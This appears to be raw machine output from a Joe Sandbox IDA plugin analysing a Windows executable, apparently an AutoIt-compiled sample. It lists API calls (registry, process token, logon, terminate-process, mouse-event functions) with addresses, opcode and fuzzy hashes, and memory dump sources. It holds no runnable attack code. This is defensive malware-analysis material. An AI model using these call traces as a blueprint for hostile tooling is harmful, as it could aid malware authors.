                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: df6f9807a8969a813020795fafacc4d03b6846abc271e117b57274013f65a17b
                                                                  • Instruction ID: dae308acd2e098a0109da850b4a54e540b50a43d2cfbc42e39c19615611fe942
                                                                  • Opcode Fuzzy Hash: df6f9807a8969a813020795fafacc4d03b6846abc271e117b57274013f65a17b
                                                                  • Instruction Fuzzy Hash: 3E21767220521B6AD720BB34AC22FB7739CEF95308F11443AF94686191EB999D82D3A5
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DC09
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094DC2F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0094DC32
                                                                  • SysAllocString.OLEAUT32 ref: 0094DC53
                                                                  • SysFreeString.OLEAUT32 ref: 0094DC5C
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0094DC76
                                                                  • SysAllocString.OLEAUT32(?), ref: 0094DC84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 3dc756ad0aa1fcfbdb24b82fd432d46ad0aab682e3771322b26c835e9a17f374
                                                                  • Instruction ID: 9555990790606f4141cc215dc2c71720055702b38305b81823980d9dedb9cd40
                                                                  • Opcode Fuzzy Hash: 3dc756ad0aa1fcfbdb24b82fd432d46ad0aab682e3771322b26c835e9a17f374
                                                                  • Instruction Fuzzy Hash: 4321B63A209204AF9B10DFA8DCC8DAB77ECFB48361B108125F958DB260D6B4DC81D764
                                                                  APIs
                                                                    • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
                                                                    • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
                                                                    • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00977632
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097763F
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097764A
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00977659
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00977665
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: 299e5f037310215f394627868f8dd1ea4b14185c60c693f13fb4de99be3257ff
                                                                  • Instruction ID: f057fe706d158086adc9f54d559b3e84c1a8874690cd3493fa9200185c2febf9
                                                                  • Opcode Fuzzy Hash: 299e5f037310215f394627868f8dd1ea4b14185c60c693f13fb4de99be3257ff
                                                                  • Instruction Fuzzy Hash: 631193B211021DBFEF119F64CC85EE7BF6DFF48798F014114B608A2050CA729C21DBA4
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 00919AE6
                                                                    • Part of subcall function 00913187: EncodePointer.KERNEL32(00000000), ref: 0091318A
                                                                    • Part of subcall function 00913187: __initp_misc_winsig.LIBCMT ref: 009131A5
                                                                    • Part of subcall function 00913187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00919EA0
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00919EB4
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00919EC7
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00919EDA
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00919EED
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00919F00
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00919F13
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00919F26
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00919F39
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00919F4C
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00919F5F
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00919F72
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00919F85
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00919F98
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00919FAB
                                                                    • Part of subcall function 00913187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00919FBE
                                                                  • __mtinitlocks.LIBCMT ref: 00919AEB
                                                                  • __mtterm.LIBCMT ref: 00919AF4
                                                                    • Part of subcall function 00919B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00919AF9,00917CD0,009AA0B8,00000014), ref: 00919C56
                                                                    • Part of subcall function 00919B5C: _free.LIBCMT ref: 00919C5D
                                                                    • Part of subcall function 00919B5C: DeleteCriticalSection.KERNEL32(009AEC00,?,?,00919AF9,00917CD0,009AA0B8,00000014), ref: 00919C7F
                                                                  • __calloc_crt.LIBCMT ref: 00919B19
                                                                  • __initptd.LIBCMT ref: 00919B3B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00919B42
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 3567560977-0
                                                                  • Opcode ID: 4c4a6753facf8f76adf7d1ce97f2ced57e75eadc1a4b24414d3c1ddded22359b
                                                                  • Instruction ID: 336f89c9a03a7d3c9380b083ab9087be2c96adfa1b561d4979029fc66225b1b0
                                                                  • Opcode Fuzzy Hash: 4c4a6753facf8f76adf7d1ce97f2ced57e75eadc1a4b24414d3c1ddded22359b
                                                                  • Instruction Fuzzy Hash: 18F09032B5D7196AF634B774BC237CB26949F82734F204A19F464DA1D2EF2085C141A0
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00913F85), ref: 00914085
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0091408C
                                                                  • EncodePointer.KERNEL32(00000000), ref: 00914097
                                                                  • DecodePointer.KERNEL32(00913F85), ref: 009140B2
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 3489934621-2819208100
                                                                  • Opcode ID: 052d1c7cc1387df2c07c62aaa5a762a597c7e3af1fe084cc23f457379b33d377
                                                                  • Instruction ID: fbeea6372d3dd8291a4c3f943d46e00eec0bb51f6bb5655036dcc6df1998fc2b
                                                                  • Opcode Fuzzy Hash: 052d1c7cc1387df2c07c62aaa5a762a597c7e3af1fe084cc23f457379b33d377
                                                                  • Instruction Fuzzy Hash: 56E046716AC300EFEB10EF65EE0DB413AACFB08792F108124F105F11A0CBB28280EB10
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _memmove$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 3253778849-0
                                                                  • Opcode ID: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                  • Instruction ID: b2bcf3ff4a2715f4929cf56b4fcf8ca96849b2d9039f4710b9c6b90d09f45687
                                                                  • Opcode Fuzzy Hash: 07f7beecbd1dd8334db84aaf9af2abfb4d3119d97a414b28777fd7aaa104b083
                                                                  • Instruction Fuzzy Hash: 1F618B3060025E9BCF01EF65CC82FFE3BA9EF89308F444928FD599B192DA759849CB51
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009702BD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009702FD
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00970320
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00970349
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097038C
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00970399
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                  • String ID:
                                                                  • API String ID: 4046560759-0
                                                                  • Opcode ID: a42ebe339f9808213cdfc32782271632d128e5b48eb5f21510b561546d4c5726
                                                                  • Instruction ID: 4a598a43fb94c942490d285112a58735954052756426d60d30e01c76d304369c
                                                                  • Opcode Fuzzy Hash: a42ebe339f9808213cdfc32782271632d128e5b48eb5f21510b561546d4c5726
                                                                  • Instruction Fuzzy Hash: 6E516A32208204DFC714EF68C895E6EBBE8FF85314F04891DF5999B2A2DB31E944CB52
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 009757FB
                                                                  • GetMenuItemCount.USER32(00000000), ref: 00975832
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0097585A
                                                                  • GetMenuItemID.USER32(?,?), ref: 009758C9
                                                                  • GetSubMenu.USER32(?,?), ref: 009758D7
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00975928
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: 86ea23961fabfbff49ac89e441375c9d8c585961a0b679ca606a1b224827b950
                                                                  • Instruction ID: 9de8f50eff236957422bf05e4774bf20bfab3dc0c95a1b2210fae5c6e42079ba
                                                                  • Opcode Fuzzy Hash: 86ea23961fabfbff49ac89e441375c9d8c585961a0b679ca606a1b224827b950
                                                                  • Instruction Fuzzy Hash: 7F515A32E00619EFCF11EF64C845AEEB7B4EF48320F118469E949BB351CB75AE418B91
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0094EF06
                                                                  • VariantClear.OLEAUT32(00000013), ref: 0094EF78
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0094EFD3
                                                                  • _memmove.LIBCMT ref: 0094EFFD
                                                                  • VariantClear.OLEAUT32(?), ref: 0094F04A
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0094F078
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                  • String ID:
                                                                  • API String ID: 1101466143-0
                                                                  • Opcode ID: 1c1e7db052f193df5016788006c7436200b3ac5683a68b9fe83e26952fdd57c1
                                                                  • Instruction ID: 9905d05d7cc01529a2962af6f04b731653c86e48690c8c9fd046f4624d6853c7
                                                                  • Opcode Fuzzy Hash: 1c1e7db052f193df5016788006c7436200b3ac5683a68b9fe83e26952fdd57c1
                                                                  • Instruction Fuzzy Hash: B4516D75A00209DFCB14CF58C894EAAB7B8FF8C314B158569E959DB301E335E951CFA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952258
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009522A3
                                                                  • IsMenu.USER32(00000000), ref: 009522C3
                                                                  • CreatePopupMenu.USER32 ref: 009522F7
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00952355
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00952386
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: e17a6fff31ae90558a5dc6cfca3b2013e3007cf19e54ed81dadc2a214b807088
                                                                  • Instruction ID: 7e9ff96ace7635275ad649998043297a47b81bbf097a6b82fb996b0503fb5bce
                                                                  • Opcode Fuzzy Hash: e17a6fff31ae90558a5dc6cfca3b2013e3007cf19e54ed81dadc2a214b807088
                                                                  • Instruction Fuzzy Hash: 3351F33060420ADFCF24CF66D888BADBBF8FF46716F144529EC15A7290E3799A48CB51
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 008F179A
                                                                  • GetWindowRect.USER32(?,?), ref: 008F17FE
                                                                  • ScreenToClient.USER32(?,?), ref: 008F181B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F182C
                                                                  • EndPaint.USER32(?,?), ref: 008F1876
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 1827037458-0
                                                                  • Opcode ID: 726f6f4d315751f068e48ffbf1f851f23c8296e6087fce7ae0a542e7ded06c39
                                                                  • Instruction ID: ddc9451a8cfc38234fcd0df5dd62714f67d1269fd3348a325718bf966799afa1
                                                                  • Opcode Fuzzy Hash: 726f6f4d315751f068e48ffbf1f851f23c8296e6087fce7ae0a542e7ded06c39
                                                                  • Instruction Fuzzy Hash: 4D418F31118708DFDB11DF24DC88BB67BE8FB49764F144629F6A8C61A1C7309845EB62
                                                                  APIs
                                                                  • ShowWindow.USER32(009B57B0,00000000,01394E50,?,?,009B57B0,?,0097B5A8,?,?), ref: 0097B712
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0097B736
                                                                  • ShowWindow.USER32(009B57B0,00000000,01394E50,?,?,009B57B0,?,0097B5A8,?,?), ref: 0097B796
                                                                  • ShowWindow.USER32(00000000,00000004,?,0097B5A8,?,?), ref: 0097B7A8
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0097B7CC
                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0097B7EF
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: e48b97e96c37bc5c2224ab10b02f507ef4ab2227342618c6db8d13284b5f44e2
                                                                  • Instruction ID: 58f886d79d49a03851b32497698a1a1510d24691e8e1392739c2a5f37c4e920b
                                                                  • Opcode Fuzzy Hash: e48b97e96c37bc5c2224ab10b02f507ef4ab2227342618c6db8d13284b5f44e2
                                                                  • Instruction Fuzzy Hash: E8419136604244EFDB2ACF24C499B947BE5FF85314F1881B9F94C9FAA2C731A856CB50
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00964E41,?,?,00000000,00000001), ref: 009670AC
                                                                    • Part of subcall function 009639A0: GetWindowRect.USER32(?,?), ref: 009639B3
                                                                  • GetDesktopWindow.USER32 ref: 009670D6
                                                                  • GetWindowRect.USER32(00000000), ref: 009670DD
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0096710F
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  • GetCursorPos.USER32(?), ref: 0096713B
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00967199
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: 7258a59ff63753f3ce7eba20564a44d123073ba9a316fbd5e5e944f288ab0099
                                                                  • Instruction ID: fb783a2d12f6a917325eb4b97fd404f57133b615659829afbb447f7af3269915
                                                                  • Opcode Fuzzy Hash: 7258a59ff63753f3ce7eba20564a44d123073ba9a316fbd5e5e944f288ab0099
                                                                  • Instruction Fuzzy Hash: 1031D272509305ABD720DF64C849B9BB7A9FF89318F00091AF599A7191D630EA49CB92
                                                                  APIs
                                                                    • Part of subcall function 009480A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009480C0
                                                                    • Part of subcall function 009480A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009480CA
                                                                    • Part of subcall function 009480A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009480D9
                                                                    • Part of subcall function 009480A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009480E0
                                                                    • Part of subcall function 009480A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009480F6
                                                                  • GetLengthSid.ADVAPI32(?,00000000,0094842F), ref: 009488CA
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009488D6
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009488DD
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 009488F6
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,0094842F), ref: 0094890A
                                                                  • HeapFree.KERNEL32(00000000), ref: 00948911
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: 09e6684956a5fafc5a2a321a09414cf052e63549560a048dff8caf453934e811
                                                                  • Instruction ID: 0b94239b6b49b2f6d761c74f26bba2b0412b24313d71471948466e83eff2448d
                                                                  • Opcode Fuzzy Hash: 09e6684956a5fafc5a2a321a09414cf052e63549560a048dff8caf453934e811
                                                                  • Instruction Fuzzy Hash: 2411AF32525609FFDB149FA4DC19FBF776CFB85315F504028E849A7210CB329940DB60
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009485E2
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 009485E9
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009485F8
                                                                  • CloseHandle.KERNEL32(00000004), ref: 00948603
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00948632
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00948646
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: 7d87cbbf06c215df034c80203b6f4a7421a0eaa48c9b9aadb29cb71e84a81255
                                                                  • Instruction ID: d9be240bed4be231c72177712631a5b200b2eaecb7eab8afe866501771f610f9
                                                                  • Opcode Fuzzy Hash: 7d87cbbf06c215df034c80203b6f4a7421a0eaa48c9b9aadb29cb71e84a81255
                                                                  • Instruction Fuzzy Hash: 25114772514209ABDF018FA4ED49FEF7BA9EF08344F044064FE08A2161C6728DA0AB60
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0094B7B5
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0094B7C6
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0094B7CD
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0094B7D5
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094B7EC
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0094B7FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 9f0b305cfbc4db48e0c0c0ecdd3f59631649c95a1c191cfb8d977f730cc312d3
                                                                  • Instruction ID: 705294748b56082546554ef64c8f9bb5a3b55a1171ee254c6901978e01777fe1
                                                                  • Opcode Fuzzy Hash: 9f0b305cfbc4db48e0c0c0ecdd3f59631649c95a1c191cfb8d977f730cc312d3
                                                                  • Instruction Fuzzy Hash: 61014476E04219BBEF109BA69D45F5EBFB8EB48761F004075FA08A7291D6709C10DF91
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00910193
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 0091019B
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009101A6
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009101B1
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 009101B9
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009101C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: a365f545a8e54cf5e0a37f543d79e7419aa0cd48049aba88081ce102843852e1
                                                                  • Instruction ID: bf52fb140d841757ac7fb1e0a34a77cc94d29be8b5f5c5c03d0bc548d9ad7243
                                                                  • Opcode Fuzzy Hash: a365f545a8e54cf5e0a37f543d79e7419aa0cd48049aba88081ce102843852e1
                                                                  • Instruction Fuzzy Hash: B3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009553F9
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0095540F
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0095541E
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0095542D
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00955437
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0095543E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: e9be869641faa3fa4a497b07a2c9278a25e644ce22dd70cf92d85b34ff24d098
                                                                  • Instruction ID: f01c485e6f37ae3f46ff37ac36c712faade83c0db346c03b138bb0c376b191ec
                                                                  • Opcode Fuzzy Hash: e9be869641faa3fa4a497b07a2c9278a25e644ce22dd70cf92d85b34ff24d098
                                                                  • Instruction Fuzzy Hash: 04F06D32258558BBE3205BA29C0DEAB7A7CEBC6B12F000169FA08E106196A01A41D6B5
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00957243
                                                                  • EnterCriticalSection.KERNEL32(?,?,00900EE4,?,?), ref: 00957254
                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00900EE4,?,?), ref: 00957261
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00900EE4,?,?), ref: 0095726E
                                                                    • Part of subcall function 00956C35: CloseHandle.KERNEL32(00000000,?,0095727B,?,00900EE4,?,?), ref: 00956C3F
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00957281
                                                                  • LeaveCriticalSection.KERNEL32(?,?,00900EE4,?,?), ref: 00957288
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
